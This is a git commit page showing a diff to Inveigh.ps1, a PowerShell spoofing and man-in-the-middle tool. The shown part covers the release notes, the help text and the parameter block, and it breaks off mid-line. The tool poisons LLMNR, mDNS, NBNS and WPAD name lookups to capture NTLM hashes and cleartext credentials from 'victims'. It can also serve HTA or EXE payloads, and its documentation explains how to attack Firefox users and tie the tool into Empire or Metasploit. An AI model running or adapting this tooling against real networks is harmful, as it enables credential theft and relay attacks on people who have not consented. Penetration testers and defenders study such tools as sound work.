diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-04-05 00:17:13 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-04-05 00:17:13 -0400 |
| commit | cf83593f06df0b3a8e2007bc5859e2737314d97f (patch) | |
| tree | d590f3dc49fd896d33b5f316a4323ba4c54792e5 /Scripts/Inveigh.ps1 | |
| parent | a70095cb2d015c12134ce646750080f38c2f5ed0 (diff) | |
| download | Inveigh-cf83593f06df0b3a8e2007bc5859e2737314d97f.tar.gz Inveigh-cf83593f06df0b3a8e2007bc5859e2737314d97f.zip | |
Inveigh 1.31.3
Inveigh.ps1
Merged Inveigh and Inveigh-Unprivileged. The new module will run the
correct functions based on the detected privilege level or
ElevatedPrivilege parameter setting.
Added proxy auth capture. (thanks to @lgandx and @mubix for the idea
from https://github.com/lgandx/Responder)
Added mDNS spoofer.
Added limited ability to attack browsers of proxy auth targets.
Added the ability to set the content type header for HTTPReponse, or
files from disk through HTTPDir, for better support for HTA, etc.
Added the ability to capture POST requests.
Inveigh-Relay.ps1
Refactored the module.
Switched to a TCPListener based HTTP listener so that the module can be
run with an unprivileged user. If running unprivileged, the Inveigh host
can be targeted with relay for privesc.
Added support for longer commands to execute on the target. The module
is now Empire 2.0 launcher friendly.
Added SMB2 support. The module will negotiate by default and can be
forced into SMB1 with the SMB1 switch.
Added proxy auth capture and relay.
Added NTLMv1 relay support.
Added RelayAutoExit parameter to stop any running Inveigh modules after
a successful relay.
Inveigh.ps1 and Inveigh-Relay.ps1
Added a new HTTPS certificate install method that does not require a
certificate file. (thanks to @subTee for code example from
https://github.com/subTee/Interceptor)
Added user agent and host header details to console/file output.
Added ability to filter out specific browsers by user agent for wpad and
proxy auth.
Added console output levels.
Added control over in memory log file and console queue.
Inveigh-Unprivileged.ps1
This module has been removed.
Diffstat (limited to 'Scripts/Inveigh.ps1')
| -rw-r--r-- | Scripts/Inveigh.ps1 | 3441 |
1 files changed, 2696 insertions, 745 deletions
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 60ece26..a8e6492 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -2,90 +2,75 @@ function Invoke-Inveigh { <# .SYNOPSIS -Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/HTTPS/SMB. +Invoke-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool with challenge/response +capture over HTTP/HTTPS/Proxy/SMB. .DESCRIPTION -Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features: +Invoke-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spooferman-in-the-middle tool with the following features: - IPv4 LLMNR/NBNS spoofer with granular control - NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB - Basic auth cleartext credential capture over HTTP/HTTPS + IPv4 LLMNR/mDNS/NBNS spoofer with granular control + NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/Proxy/SMB + Basic auth cleartext credential capture over HTTP/HTTPS/Proxy WPAD server capable of hosting a basic or custom wpad.dat file - HTTP/HTTPS server capable of hosting limited content + HTTP/HTTPS/Proxy server capable of hosting limited content Granular control of console and file output - Run time control + Run time and run count control + LLMNR/NBNS spoofer learning mode -.PARAMETER IP -Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the -SpooferIP parameter is not set. - -.PARAMETER SpooferIP -IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other -than the Inveigh host. - -.PARAMETER SpooferHostsReply -Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferHostsIgnore -Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferIPsReply -Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferIPsIgnore -Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferLearning -Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out -LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the -hostname to a spoofing blacklist. +.PARAMETER Challenge +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. -.PARAMETER SpooferLearningDelay -(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through -SpooferLearning. +.PARAMETER ConsoleOutput +Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a +shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. -.PARAMETER SpooferLearningInterval -Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a -hostname that has already been checked if SpooferLearning is enabled. +.PARAMETER ConsoleQueueLimit +Default = Unlimited: Maximum number of queued up console log entries when not using the real time console. -.PARAMETER SpooferRepeat -Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user -challenge/response has been captured. +.PARAMETER ConsoleStatus +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for +displaying full capture lists when running through a shell that does not have access to the support functions. -.PARAMETER LLMNR -Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. +.PARAMETER ConsoleUnique +Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time console output is enabled. -.PARAMETER LLMNRTTL -Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +.PARAMETER ElevatedPrivilege +Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with +elevated privilege. If so, options that require elevated privilege can be used. -.PARAMETER NBNS -Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. +.PARAMETER FileOutput +Default = Disabled: (Y/N) Enable/Disable real time file output. -.PARAMETER NBNSTTL -Default = 165 Seconds: NBNS TTL in seconds for the response packet. +.PARAMETER FileOutputDirectory +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must +also be enabled. -.PARAMETER NBNSTypes -Default = 00,20: Comma separated list of NBNS types to spoof. -Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name +.PARAMETER FileUnique +Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time file output is enabled. .PARAMETER HTTP Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. -.PARAMETER HTTPS -Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in -the local store and attached to port 443. If the script does not exit gracefully, execute -"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" -in the cert store. +.PARAMETER HTTPIP +Default = Any: IP address for the HTTP/HTTPS listener. + +.PARAMETER HTTPPort +Default = 80: TCP port for the HTTP listener. .PARAMETER HTTPAuth -Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to -wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A -WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and -connecting to the root of the web server. +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not +apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. .PARAMETER HTTPBasicRealm Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. +.PARAMETER HTTPContentType +Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to +"application/hta" for HTA files or when using HTA code with HTTPResponse. + .PARAMETER HTTPDir Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. @@ -98,100 +83,194 @@ EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for .PARAMETER HTTPResponse String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. -This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. +This parameter will not be used if HTTPDir is set. Use PowerShell character escapes and newlines where necessary. -.PARAMETER HTTPSCertAppID -Valid application GUID for use with the ceriticate. +.PARAMETER HTTPS +Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in +the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires +local administrator access. -.PARAMETER HTTPSCertThumbprint -Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current -working directory and named Inveigh.pfx. +.PARAMETER HTTPSPort +Default = 443: TCP port for the HTTPS listener. -.PARAMETER WPADAuth -Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to -Anonymous can prevent browser login prompts. +.PARAMETER HTTPSCertIssuer +Default = Inveigh: The issuer field for the cert that will be installed for HTTPS. -.PARAMETER WPADEmptyFile -Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. -Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when -using WPADIP, WPADPort, or WPADResponse. +.PARAMETER HTTPSCertSubject +Default = localhost: The subject field for the cert that will be installed for HTTPS. -.PARAMETER WPADIP -Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used -with WPADPort. +.PARAMETER HTTPSForceCertDelete +Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and +HTTPSCertSubject. -.PARAMETER WPADPort -Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be -used with WPADIP. +.PARAMETER Inspect +(Switch) Inspect LLMNR an NBNS traffic only. With elevated privilege, SMB must be disabled with -smb if you do not +want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desired inspect listeners must be enabled +with -LLMNR and/or -NBNS. -.PARAMETER WPADDirectHosts -Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the -defined proxy. +.PARAMETER IP +Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS spoofing if +the SpooferIP parameter is not set. -.PARAMETER WPADResponse -wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort -are set. Use PowerShell character escapes where necessary. +.PARAMETER LogOutput +Default = Enabled: (Y/N) Enable/Disable storing log messages in memory. -.PARAMETER SMB -Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still -direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to -prevent login requests from being processed by the Inveigh host. +.PARAMETER LLMNR +Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. -.PARAMETER Challenge -Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random -challenge will be generated for each request. +.PARAMETER LLMNRTTL +Default = 30 Seconds: LLMNR TTL in seconds for the response packet. .PARAMETER MachineAccounts Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -.PARAMETER ConsoleOutput -Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to -ensure that it doesn't hang the shell. +.PARAMETER mDNS +Default = Disabled: (Y/N) Enable/Disable mDNS spoofing. -.PARAMETER ConsoleStatus -(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for -displaying full capture lists when running through a shell that does not have access to the support functions. +.PARAMETER mDNSTTL +Default = 120 Seconds: mDNS TTL in seconds for the response packet. -.PARAMETER ConsoleUnique -Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, -and username combinations when real time console output is enabled. +.PARAMETER mDNSTypes +Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251. +Types include QU = Query Unicast, QM = Query Multicast -.PARAMETER FileOutput -Default = Disabled: (Y/N) Enable/Disable real time file output. +.PARAMETER NBNS +Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. -.PARAMETER FileUnique -Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, -and username combinations when real time file output is enabled. +.PARAMETER NBNSBruteForce +Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. -.PARAMETER StatusOutput -Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. +.PARAMETER NBNSBruteForceHost +Default = WPAD: Hostname for the NBNS Brute Force spoofer. + +.PARAMETER NBNSBruteForcePause +Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming +HTTP request is received. + +.PARAMETER NBNSBruteForceTarget +IP address to target for NBNS brute force spoofing. + +.PARAMETER NBNSTTL +Default = 165 Seconds: NBNS TTL in seconds for the response packet. + +.PARAMETER NBNSTypes +Default = 00,20: Comma separated list of NBNS types to spoof. +Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name .PARAMETER OutputStreamOnly Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams.Note that you will not see the various yellow warning messages if enabled. -.PARAMETER OutputDir -Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must -also be enabled. +.PARAMETER Proxy +Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures. -.PARAMETER RunTime -(Integer) Run time duration in minutes. +.PARAMETER ProxyAuth +Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy server authentication type. -.PARAMETER StartupChecks -Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. +.PARAMETER ProxyIP +Default = Any: IP address for the proxy listener. + +.PARAMETER ProxyPort +Default = 8492: TCP port for the proxy listener. + +.PARAMETER ProxyIgnore +Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly +with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is +cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting +-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by +closing and reopening. .PARAMETER ShowHelp Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -.PARAMETER Inspect -(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. +.PARAMETER SMB +Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still +direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to +prevent login requests from being processed by the Inveigh host. + +.PARAMETER SpooferHostsIgnore +Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferHostsReply +Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIP +IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other +than the Inveigh host. + +.PARAMETER SpooferIPsIgnore +Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIPsReply +Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferLearning +Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out +LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the +hostname to a spoofing blacklist. + +.PARAMETER SpooferLearningDelay +(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through +SpooferLearning. + +.PARAMETER SpooferLearningInterval +Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a +hostname that has already been checked if SpooferLearning is enabled. + +.PARAMETER SpooferRepeat +Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user +challenge/response has been captured. + +.PARAMETER StartupChecks +Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. + +.PARAMETER StatusOutput +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. + +.PARAMETER RunCount +Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. + +.PARAMETER RunTime +(Integer) Run time duration in minutes. .PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. 0 = None, 1 = Metasploit/Meterpreter, 2 = Empire +.PARAMETER WPADAuth +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. +Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag +during negotiation. + +.PARAMETER WPADAuthIgnore +Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login +popups for authenticated wpad.dat requests such as Firefox. + +.PARAMETER WPADDirectFile +Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. +Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when +using WPADIP, WPADPort, or WPADResponse. + +.PARAMETER WPADDirectHosts +Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the +defined proxy. + +.PARAMETER WPADIP +Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used +with WPADPort. + +.PARAMETER WPADPort +Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be +used with WPADIP. + +.PARAMETER WPADResponse +wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort +are set. Use PowerShell character escapes where necessary. + .EXAMPLE Import-Module .\Inveigh.psd1;Invoke-Inveigh Import full module and execute with all default settings. @@ -221,18 +300,6 @@ useful for sending traffic to a controlled Linux system on another subnet. Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://duckduckgo.com/'></head></html>" Execute specifying an HTTP redirect response. -.NOTES -1. An elevated administrator or SYSTEM shell is needed. -2. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. -3. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets. -4. SMB challenge/response captures are performed by sniffing over the host system's SMB service. -5. HTTP challenge/response captures are performed with a dedicated listener. -6. The local LLMNR/NBNS services do not need to be disabled on the host system. -7. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. -8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. -9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system. -10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns. - .LINK https://github.com/Kevin-Robertson/Inveigh #> @@ -241,65 +308,85 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM", - [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", + [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "", + [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1", [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", + [parameter(Mandatory=$false)][Int]$HTTPPort = "80", + [parameter(Mandatory=$false)][Int]$HTTPSPort = "443", [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", + [parameter(Mandatory=$false)][Int]$mDNSTTL = "120", [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", - [parameter(Mandatory=$false)][Int]$WPADPort = "", + [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "", + [parameter(Mandatory=$false)][Int]$ProxyPort = "8492", + [parameter(Mandatory=$false)][Int]$RunCount = "", [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$false)][Int]$WPADPort = "", [parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "", [parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30", [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS", + [parameter(Mandatory=$false)][String]$HTTPContentType = "text/html", [parameter(Mandatory=$false)][String]$HTTPDefaultFile = "", [parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "", [parameter(Mandatory=$false)][String]$HTTPResponse = "", - [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF", - [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d", + [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh", + [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost", + [parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD", [parameter(Mandatory=$false)][String]$WPADResponse = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$mDNS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("QU","QM")][Array]$mDNSTypes = @("QU"), + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), + [parameter(Mandatory=$false)][ValidateSet("Basic","NTLM","NTLMNoESS")][String]$ProxyAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "", [parameter(Mandatory=$false)][Switch]$Inspect, + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) if ($invalid_parameter) { - throw "$($invalid_parameter) is not a valid parameter." + Write-Output "Error:$($invalid_parameter) is not a valid parameter" + throw } -if($inveigh.HTTP -or $inveigh.HTTPS) -{ - throw "You must stop stop other Inveigh HTTP/HTTPS listeners before running this module." -} +$inveigh_version = "1.3" if(!$IP) { @@ -316,7 +403,8 @@ if($HTTPDefaultFile -or $HTTPDefaultEXE) if(!$HTTPDir) { - throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE" + Write-Output "Error:You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE" + throw } } @@ -326,72 +414,154 @@ if($WPADIP -or $WPADPort) if(!$WPADIP) { - throw "You must specify a -WPADPort to go with -WPADIP" + Write-Output "Error:You must specify a -WPADPort to go with -WPADIP" + throw } if(!$WPADPort) { - throw "You must specify a -WPADIP to go with -WPADPort" + Write-Output "Error:You must specify a -WPADIP to go with -WPADPort" + throw } } -if(!$OutputDir) +if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget) +{ + Write-Output "Error:You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce" + throw +} + +if(!$FileOutputdirectory) { $output_directory = $PWD.Path } else { - $output_directory = $OutputDir + $output_directory = $FileOutputdirectory } if(!$inveigh) { $global:inveigh = [HashTable]::Synchronized(@{}) + $inveigh.cleartext_list = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.log = New-Object System.Collections.ArrayList $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList - $inveigh.cleartext_list = New-Object System.Collections.ArrayList - $inveigh.IP_capture_list = New-Object System.Collections.ArrayList + $inveigh.POST_request_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList $inveigh.valid_host_list = New-Object System.Collections.ArrayList } if($inveigh.running) { - throw "Invoke-Inveigh is already running, use Stop-Inveigh" + Write-Output "Error:Invoke-Inveigh is already running, use Stop-Inveigh" + throw } -$inveigh.sniffer_socket = $null - -if($inveigh.HTTP_listener.IsListening -and 